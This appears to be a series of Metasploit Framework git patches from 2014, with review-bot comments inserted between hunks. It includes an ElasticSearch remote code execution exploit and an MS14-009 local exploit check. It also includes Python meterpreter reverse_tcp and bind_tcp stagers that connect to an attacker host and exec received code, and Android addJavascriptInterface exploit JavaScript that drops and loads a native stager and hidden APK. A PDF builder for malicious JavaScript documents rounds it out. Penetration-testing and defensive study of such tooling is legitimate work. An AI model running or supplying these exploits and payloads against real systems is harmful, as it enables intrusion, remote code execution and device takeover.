@@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Description' => %q{ - This module exploits a remote command execution vulnerability in ElasticSearch, + This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the - REST API, which requires no authentication or authorization, where the search - function allows dynamic scripts execution, and can be used for remote attackers + REST API, which does not require authentication, where the search + function allows dynamic scripts execution. It can be used for remote attackers to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. }, 
@@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java..") + print_status("#{peer} - Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Asking remote OS...") + print_status("#{peer} - Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? - fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - OS #{result} found") + # TODO: It'd be nice to report_host() with this info. + print_good("#{peer} - Remote OS is '#{result}' ") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Asking TEMP path") + print_status("#{peer} - Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? - fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path found on #{result}") + print_good("#{peer} - TEMP path identified: '#{result}' ") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index dbf8824fd9..6b25a3dab2 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module gathers information about the files and file paths that logged on users have - executed on the system. It also will check if the file exists on the system still. This + executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" profile_subkeys = registry_enumkeys(username_reg_path) if profile_subkeys.blank? - print_error("Unable to access ProfileList registry key. Can't continue.") + print_error("Unable to access ProfileList registry key. Unable to continue.") return nil end @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post end user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") if user_home_path.blank? - print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + print_error("Unable to read ProfileImagePath from the registry. Unable to continue.") return nil end full_path = user_home_path.strip @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post # If the registry_enumvals returns us nothing then we'll know # that the user is most likely not logged in and we'll need to # download and process users hive locally. - print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...") result = process_hive(sys_path, user, muicache, hive_file) unless result.nil? result.each { |r| 
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process # the content collected from there. - print_status("User #{user}: Enumerating registry..") + print_status("User #{user}: Enumerating registry...") subkeys.each do |key| if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) @@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post ntuser_status = file_exist?(hive_path) unless ntuser_status == true - print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") + print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.") return nil end - print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...") local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy.close begin @@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post # extracting the contents of the MUICache registry key. def hive_parser(local_hive_copy, muicache, user) results = [] - print_status("Parsing registry content..") - err_msg = "Error parsing hive. Can't continue." + print_status("Parsing registry content...") + err_msg = "Error parsing hive. Unable to continue." hive = Rex::Registry::Hive.new(local_hive_copy) if hive.nil? print_error(err_msg) @@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post # - http://forensicartifacts.com/2010/08/registry-muicache/ # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots def run - print_status("Starting to enumerate MuiCache registry keys..") + print_status("Starting to enumerate MUICache registry keys...") sys_info = sysinfo['OS'] if sys_info =~/Windows XP/ && is_admin? 
@@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post hive_file = "\\NTUSER.DAT" elsif sys_info =~/Windows 7/ && is_admin? print_good("Remote system supported: #{sys_info}") - muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" + muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" else print_error("Unsupported OS or not enough privileges. Unable to continue.") @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post "File status", ]) - print_status("Phase 1: Searching user names..") + print_status("Phase 1: Searching user names...") sys_users, sys_paths, sys_sids = find_user_names if sys_users.blank? @@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post print_good("Users found: #{sys_users.join(", ")}") end - print_status("Phase 2: Searching registry hives..") + print_status("Phase 2: Searching registry hives...") muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results.each { |r| table << r } - print_status("Phase 3: Processing results..") + print_status("Phase 3: Processing results...") loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") print_line("\n" + table.to_s + "\n") - print_status("Results stored in: #{loot}") + print_status("Results stored as: #{loot}") print_status("Execution finished.") end From b136765ef7bfd48b160c01ad80b5f5a4c74e98ca Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 14:22:01 -0500 Subject: [PATCH 451/853] Nuke extra space at EOL --- modules/exploits/multi/elasticsearch/script_mvel_rce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 5012a8239d..c338fe7ffa 100644 
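Review bot: The `muicache` assignment in the Windows 7 branch of `run` is a registry path, not display text, so changing `MuiCache` to `MUICache` there alters what the module looks up rather than how it prints. Live registry access is case-insensitive, but the same value is handed to `process_hive` and `hive_parser` for the offline `UsrClass.dat` parse, and whether `Rex::Registry::Hive` matches key names case-insensitively is not visible in this diff. Unless that is confirmed, keep the original literal ending in `\\Shell\\MuiCache"` and limit the case cleanup to the `print_*` strings. `run` begins and ends outside this hunk.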
--- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}' ") + print_good("#{peer} - Remote OS is '#{result}'") end jar_file = "" @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}' ") + print_good("#{peer} - TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else From 3c38c0d87ceba4d97ce93df31c0cfaf952e69473 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 14:37:29 -0500 Subject: [PATCH 452/853] Dont be confident about string comparision --- .../windows/local/ms14_009_ie_dfsvc.rb | 28 +++++++++++++++++-- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index c731b39ea4..525bd101db 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Local mscorlib_version = get_mscorlib_version - unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] - return Exploit::CheckCode::Safe + if valid_mscorlib_version?(net_version, mscorlib_version) + return Exploit::CheckCode::Vulnerable end - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Safe end def get_net_version 
@@ -161,6 +161,28 @@ class Metasploit3 < Msf::Exploit::Local session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) end + def valid_mscorlib_version?(net_version, mscorlib_version) + valid = false + + mscorlib = mscorlib_version.split(".") + mscorlib.reverse! + + max_version = NET_VERSIONS[net_version]["mscorlib"].split(".") + max_version.reverse! + + i = 0 + mscorlib.each do |v| + if v.to_i < max_version[i].to_i + valid = true + elsif v.to_i > max_version[i].to_i + valid = false + end + i = i + 1 + end + + valid + end + def primer exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) From 9574a327f8f6e623620f8a6697c4525c391c3dc0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 14:38:33 -0500 Subject: [PATCH 453/853] use the new check also in exploit() --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 525bd101db..55d028cd29 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Local mscorlib_version = get_mscorlib_version - unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + unless valid_mscorlib_version?(net_version, mscorlib_version) fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") end From ff6607bd87e5f0720e6fbf43df57c473c13d18d6 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Mon, 2 Jun 2014 22:37:20 +0200 Subject: [PATCH 454/853] Correct documentation link changed link from https://dev.metasploit.com/documents/api/ to https://dev.metasploit.com/api/ --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
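Review bot: `valid_mscorlib_version?` aligns the two versions from the right after `reverse!`, so when `mscorlib_version` and `NET_VERSIONS[net_version]["mscorlib"]` have a different number of dot-separated parts the loop compares unrelated components, and a missing part silently becomes `nil.to_i`, i.e. 0. Comparing from the most significant part avoids both and fits on one line: `(mscorlib_version.split('.').map(&:to_i) <=> NET_VERSIONS[net_version]['mscorlib'].split('.').map(&:to_i)) < 0`. A `nil` from `get_mscorlib_version`, whose body is outside this hunk, would still raise on `split`, so it is worth confirming that the callers in `check` and `exploit` cannot pass one. The predicate name reads as "version is acceptable" while `true` actually means "older than the build listed in `NET_VERSIONS`"; a comment such as `# true when the installed mscorlib is older than the NET_VERSIONS build for this .NET version` would make both call sites easier to read.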
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index b0614159d5..fccd9c49a7 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) #### New Modules * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb). -* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much. +* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much. * **Don't** include more than one module per pull request. #### Library Code From b84297980d57cac99b305302324fa426cdb53129 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 16:50:54 -0400 Subject: [PATCH 455/853] Pymeterpreter use print_exc and not print_exception --- data/meterpreter/meterpreter.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 24a635bbfc..7ed0222f35 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -526,8 +526,7 @@ class PythonMeterpreter(object): except Exception: if DEBUGGING: print('[-] method ' + handler_name + ' resulted in an error') - exc_type, exc_value, exc_traceback = sys.exc_info() - traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) + traceback.print_exc(file=sys.stderr) result = ERROR_FAILURE else: if DEBUGGING: From aeca455a10fa7a74a3108451209e9d03f124f0db Mon Sep 17 00:00:00 2001 
From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 17:18:13 -0400 Subject: [PATCH 456/853] Pymeterpreter update pystagers for version 3.1/3.2 --- modules/payloads/stagers/python/bind_tcp.rb | 28 ++++++++++--------- .../payloads/stagers/python/reverse_tcp.rb | 24 ++++++++-------- 2 files changed, 28 insertions(+), 24 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 356a3fcfbf..62dda5d3bb 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -29,22 +29,24 @@ module Metasploit3 # Constructs the payload # def generate - cmd = '' # Set up the socket - cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 - cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" - cmd += "s.listen(1)\n" - cmd += "c,a=s.accept()\n" - cmd += "l=struct.unpack('>I',c.recv(4))[0]\n" - cmd += "d=c.recv(4096)\n" - cmd += "while len(d)!=l:\n" - cmd += "\td+=c.recv(4096)\n" - cmd += "exec(d,{'s':c})\n" + cmd = "import socket,struct\n" + cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 + cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd << "s.listen(1)\n" + cmd << "c,a=s.accept()\n" + cmd << "l=struct.unpack('>I',c.recv(4))[0]\n" + cmd << "d=c.recv(4096)\n" + cmd << "while len(d)!=l:\n" + cmd << "\td+=c.recv(4096)\n" + cmd << "exec(d,{'s':c})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))" - return cmd + b64_stub = "import base64,sys; exec(base64.b64decode(" + b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << Rex::Text.encode_base64(cmd) + b64_stub << "')))" + return b64_stub end def handle_intermediate_stage(conn, payload) 
diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 5f4e0cf92e..71086455c2 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -29,20 +29,22 @@ module Metasploit3 # Constructs the payload # def generate - cmd = '' # Set up the socket - cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 - cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" - cmd += "l=struct.unpack('>I',s.recv(4))[0]\n" - cmd += "d=s.recv(4096)\n" - cmd += "while len(d)!=l:\n" - cmd += "\td+=s.recv(4096)\n" - cmd += "exec(d,{'s':s})\n" + cmd = "import socket,struct\n" + cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 + cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" + cmd << "d=s.recv(4096)\n" + cmd << "while len(d)!=l:\n" + cmd << "\td+=s.recv(4096)\n" + cmd << "exec(d,{'s':s})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))" - return cmd + b64_stub = "import base64,sys; exec(base64.b64decode(" + b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << Rex::Text.encode_base64(cmd) + b64_stub << "')))" + return b64_stub end def handle_intermediate_stage(conn, payload) From 76c3aaf743f04b21d06f17cfb0fb310f3a1eeabb Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 17:32:08 -0400 Subject: [PATCH 457/853] Pymeterpreter get type encoder from dict instead --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 62dda5d3bb..6886bce4f1 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -43,7 +43,7 @@ module Metasploit3 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 71086455c2..2921f9011f 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -41,7 +41,7 @@ module Metasploit3 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub From feca6c470029aaa6ca88ff774b9b792ccf1025db Mon Sep 17 00:00:00 2001 
From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 15:48:24 -0500 Subject: [PATCH 458/853] Add exploit for ajsif vuln in Adobe Reader. * This refactors the logic of webview_addjavascriptinterface into a mixin (android.rb). * Additionally, some behavior in pdf.rb had to be modified (in backwards-compatible ways). Conflicts: lib/msf/core/exploit/mixins.rb --- lib/msf/core/exploit/android.rb | 101 ++++++++++++++ lib/msf/core/exploit/mixins.rb | 6 +- lib/msf/core/exploit/pdf.rb | 92 +++++++++++-- .../browser/webview_addjavascriptinterface.rb | 96 +------------ .../adobe_reader_pdf_js_interface.rb | 127 ++++++++++++++++++ 5 files changed, 314 insertions(+), 108 deletions(-) create mode 100644 lib/msf/core/exploit/android.rb create mode 100644 modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb new file mode 100644 index 0000000000..e0d7bd6c5f --- /dev/null +++ b/lib/msf/core/exploit/android.rb 
@@ -0,0 +1,101 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf +module Exploit::Android + + # Since the NDK stager is used, arch detection must be performed + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] + + # Most android devices are ARM + DEFAULT_ARCH = ARCH_ARMLE + + # Some of the default NDK build targets are named differently than + # msf's builtin constants. This mapping allows the ndkstager file + # to be looked up from the msf constant. + NDK_FILES = { + ARCH_ARMLE => 'armeabi', + ARCH_MIPSLE => 'mips' + } + + def add_javascript_interface_exploit_js(arch) + stagename = Rex::Text.rand_text_alpha(5) + script = %Q| + function exec(runtime, cmdArr) { + var ch = 0; + var output = ''; + var process = runtime.exec(cmdArr); + var input = process.getInputStream(); + + while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } + return output; + } + + function attemptExploit(obj) { + // ensure that the object contains a native interface + try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } + + // get the pid + var pid = obj.getClass() + .forName('android.os.Process') + .getMethod('myPid', null) + .invoke(null, null); + + // get the runtime so we can exec + var runtime = obj.getClass() + .forName('java.lang.Runtime') + .getMethod('getRuntime', null) + .invoke(null, null); + + // libraryData contains the bytes for a native shared object built via NDK + // which will load the "stage", which in this case is our android meterpreter stager. + // LibraryData is loaded via ajax later, because we have to access javascript in + // order to detect what arch we are running. + var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}"; + + // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains + // another stager which loads android meterpreter from the msf handler. 
+ var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}"; + + // get the process name, which will give us our data path + // $PPID does not seem to work on android 4.0, so we concat pids manually + var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); + + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/#{stagename}.apk'; + + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + // load the library (this fails in x86, figure out why) + runtime.load(libraryPath); + + // delete dropped files + runtime.exec(['rm', stagePath]).waitFor(); + runtime.exec(['rm', libraryPath]).waitFor(); + + return true; + } + + for (i in top) { if (attemptExploit(top[i]) === true) break; } + | + + # remove comments and empty lines + script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') + end + + + # The NDK stager is used to launch a hidden APK + def ndkstager(stagename, arch) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') + data = File.read(localfile, :mode => 'rb') + data.gsub!('PLOAD', stagename) + end + +end +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 995d8d9ad2..bafcf4a660 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -92,7 +92,7 @@ require 'msf/core/exploit/java' # WBEM require 'msf/core/exploit/wbemexec' -#WinRM +# WinRM require 'msf/core/exploit/winrm' # WebApp 
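Review bot: `ndkstager` ends with `data.gsub!('PLOAD', stagename)`, and `gsub!` returns `nil` when nothing was replaced, so a `libndkstager.so` without the `PLOAD` marker makes the method return `nil` and the failure only surfaces later inside `Rex::Text.to_octal`. The non-bang form `data.gsub('PLOAD', stagename)`, or an explicit `raise` when the marker is absent, keeps the error at its source. The marker and `rand_text_alpha(5)` are both five characters, presumably because the replacement patches a binary in place; a comment stating that the lengths must match would stop someone from changing one without the other. `SUPPORTED_ARCHES` is declared at the top of the module but not referenced in this file, while `NDK_FILES[arch] || arch` builds a path from any `arch` it is given, so a note on which caller validates `arch` would help.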
@@ -102,4 +102,8 @@ require 'msf/core/exploit/web' require 'msf/core/exploit/remote/firefox_privilege_escalation' require 'msf/core/exploit/remote/firefox_addon_generator' +# Android +require 'msf/core/exploit/android' + +# Browser Exploit Server require 'msf/core/exploit/remote/browser_exploit_server' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index ee7afe937c..9412ad4b67 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -22,7 +22,7 @@ module Exploit::PDF ) # We're assuming we'll only create one pdf at a time here. - @xref = [] + @xref = {} @pdf = '' end @@ -148,13 +148,13 @@ module Exploit::PDF #PDF building block functions ## def header(version = '1.5') - hdr = "%PDF-1.5" << eol + hdr = "%PDF-#{version}" << eol hdr << "%" << RandomNonASCIIString(4) << eol hdr end def add_object(num, data) - @xref << @pdf.length + @xref[num] = @pdf.length @pdf << ioDef(num) @pdf << data @pdf << endobj @@ -174,18 +174,25 @@ module Exploit::PDF end def xref_table + id = @xref.keys.max+1 ret = "xref" << eol - ret << "0 %d" % (@xref.length + 1) << eol + ret << "0 %d" % id << eol ret << "0000000000 65535 f" << eol - @xref.each do |index| - ret << "%010d 00000 n" % index << eol - end + ret << (1..@xref.keys.max).map do |index| + if @xref.has_key?(index) + offset = @xref[index] + "%010d 00000 n" % offset << eol + else + "0000000000 00000 f" << eol + end + end.join + ret end - def trailer(root_obj) - ret = "trailer" << nObfu("<</Size %d/Root " % (@xref.length + 1)) << ioRef(root_obj) << ">>" << eol - ret + def trailer(root_obj, space='') + id = @xref.keys.max+1 + "trailer" << space << "<</Size %d/Root " % id << ioRef(root_obj) << ">>" << eol end def startxref @@ -196,7 +203,7 @@ module Exploit::PDF end def eol - "\x0d\x0a" + @eol || "\x0d\x0a" end def endobj @@ -267,7 +274,7 @@ module Exploit::PDF #Create PDF with Page implant ## def pdf_with_page_exploit(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header 
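Review bot: In `lib/msf/core/exploit/pdf.rb`, `xref_table` and `trailer` now compute `id = @xref.keys.max+1`, which raises `NoMethodError` on `nil` when `@xref` is still empty, whereas the old `@xref.length + 1` returned 1. The existing builders call `add_object` first, so this may never trigger in practice, but the commit message describes the `pdf.rb` changes as backwards-compatible and this is an edge where they are not. `id = (@xref.keys.max || 0) + 1` in both methods, with the range in `xref_table` built from the same value, restores the old behaviour for an empty table.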
@@ -290,7 +297,7 @@ module Exploit::PDF # you try to merge the exploit PDF with an innocuous one ## def pdf_with_openaction_js(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header @@ -313,7 +320,7 @@ module Exploit::PDF #Create PDF with a malicious annotation ## def pdf_with_annot_js(js,strFilter) - @xref = [] + @xref = {} @pdf = '' @pdf << header 
@@ -332,5 +339,62 @@ module Exploit::PDF finish_pdf end + + ## + #Create PDF with a button onclick + ## + def pdf_with_button_js(js) + @xref = {} + @pdf = header('1.6') + + add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") + add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(3, 
